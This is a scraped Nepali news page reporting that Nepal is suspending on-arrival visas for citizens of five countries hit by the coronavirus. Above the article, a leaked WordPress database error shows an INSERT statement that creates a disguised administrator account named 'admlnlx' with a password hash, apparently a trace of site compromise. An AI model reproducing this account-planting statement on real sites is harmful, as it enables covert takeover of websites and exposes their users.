WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzIyISTwCaEtZF/QNTJp2hCcZBqw0u1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 19:48:10', '', 'admlnlx', 'admlnlx')

कोरिया, चिन लगायत ५ मुलुकका नागरिकलाई नेपालमा अनअराइभल भिसा बन्द – Gaule Khabar

कोरिया, चिन लगायत ५ मुलुकका नागरिकलाई नेपालमा अनअराइभल भिसा बन्द

कोरिया, चिन लगायत ५ मुलुकका नागरिकलाई नेपालमा अनअराइभल भिसा बन्द

गाउँले न्युज, काठमाडौं । नेपाल सरकारले ५ मुलुकका लागि अनअराइभल भिसा बन्द गर्ने निर्णय गरेको छ । मार्च ६ बाट लागु हुने गरी मार्च महिनाभर कोरोनाबाट अतिप्रभावित मुलुकबाट नेपाल आउन अनअराइभल भिसा नपाउने भएका हुन् ।

दक्षिण कोरिया, जापान, इरान, चीन र इटालीका नागरिकलाई सरकारले अनअराइभल भिषा बन्द गर्ने गृह मन्त्रालय स्रोतका जनाएको छ । अहिले पनि आंतकवादी गतिविधि भइरहेका करीव डेड दर्जन मुलुकका नागरिकलाई नेपालले अनअराइभल भिसा दिएको छैन ।
अहिले कोरोना भाइरसले विश्वव्यापी महामारीको रुप लिन थालेपछि नेपालमा पनि सतर्कताको लागि अतिप्रभावित मुलुकका नागरिकलाई अनअराइभल भिसा बन्द गर्न लागिएको अध्यागमन विभागकाले जनाएको छ ।

अध्यागमन विभाग अन्तर्गत ९ वटा प्रवेश तथा प्रस्थान विन्दुबाट नेपाल आइसकेपछि अनअराइभल भिसा प्राप्त गर्न सकिने सुविधा रहेको छ । हवाई मार्गबाट आउनेहरुका लागि त्रिभुवन विमानस्थलमा आवश्यक व्यवस्था मिलाइएको छ । अनअराइभल जारी हुने सबै भिषा ‘पर्यटक भिसा’ हुन् ।

अनअराइभल भिसा रोकिएपनि ति मुलुकका नागरिक नेपाल आउनै भने रोकिएको होइन् । उनीहरुले सम्बन्धित मुलुकमा रहेको नेपाली कूटनीतिक नियोगबाट भने भिषा पाउन सक्छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका